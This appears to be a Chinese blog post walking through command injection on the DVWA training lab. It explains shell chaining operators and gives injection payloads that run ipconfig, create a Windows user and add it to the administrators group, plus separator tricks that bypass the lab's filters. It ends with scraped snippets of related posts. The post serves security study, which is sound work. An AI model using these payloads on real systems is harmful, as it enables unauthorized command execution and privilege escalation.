DVWA(三)命令注入

2021-10-09 21:46:08 字數 1974 閱讀 1376

2.ipconfig命令

ipconfig:windows系統檢視本機ip的命令

ifconfig:linux系統檢視本機ip的命令

3.net user

net user 使用者名稱 密碼 /add :windows系統新增使用者命令

net localgroup administrators 使用者名稱 /add:將該使用者新增到超級管理員組

4.連線符

ping 127.0.0.1 && ipconfig :如果成功執行第乙個命令,則繼續執行第二個命令

ping 127.0.0.1 & ipconfig:第乙個命令無論執行成功與否,都繼續執行第二個命令

ping 127.0.0.1 || ipconfig:第乙個命令成功執行,則第二個命令不執行。若第乙個命令執行錯誤,則執行後面命令。

ping 127.0.0.1 | ipconfig:第乙個命令無論正確與否,都只執行第二個命令

ping 127.0.0.1 ;ipconfig:linux系統下的命令,執行第乙個和第二個命令。

這裡我們考慮看能不能執行ipconfig命令從而知道該主機的ip位址。

所以我們嘗試輸入:

127.0.0.1 && ipconfig

127.0.0.1 & ipconfig

127.0.0.1 | ipconfig

127.0.0.1 ; ifconfig

然後得到如下

或127.0.0.1&& net localgroup administrators test/add

因為這次是我的本地的靶場然後就出現以下尷尬的場面,火絨直接給我攔了。

在這裡插入描述

所以這個靶場最好安在虛擬機器上,要不靶場洩露了,就極有可能被黑客入侵。

執行第二條命令加入超級管理員組,擁有了超級管理員許可權。

記得到最後輸入127.0.0.1&&net user test /del命令刪除建立的使用者。

同理這裡可以考慮用burp進行抓包,對輸入項進行爆破。

看原始碼

這裡我們發現他對&&和;進行了過濾,我們這裡考慮用其他符號繞過,

這裡我們發現使用&、|、||可以繞過。

所以命令改為

127.0.0.1 & ipconfig

127.0.0.1 || ipconfig

127.0.0.1 | ipconfig

原始碼

所以我們命令改為:

127.0.0.1|ipconfig (|後不加空格)

原始碼

dvwa命令注入漏洞

在windows下測試命令執行漏洞時,返回的都是亂碼 找到www dvwa master dvwa includes dvwapage.inc.php 將277 286行的utf 8改為gb2312 只改head中的值還不起作用,還要改http header中content type的內容 或者在p...

DVWA 命令注入 全級別

1.low級別 isset post submit else feedback for the end user echo 分析 沒有過濾 解 2.medium級別 isset post submit else feedback for the end user echo 分析 替換了 和 符號 解...

dvwa 命令注入 檔案包含

if isset post submit else feedback for the end user html 分析原始碼可以看到從使用者那裡取得ip資料,呼叫系統shell執行ping命令,結果直接返回網頁,ping的目標就是使用者提交的ip資料。但是沒有任何的過濾防護導致系統shell完全可控...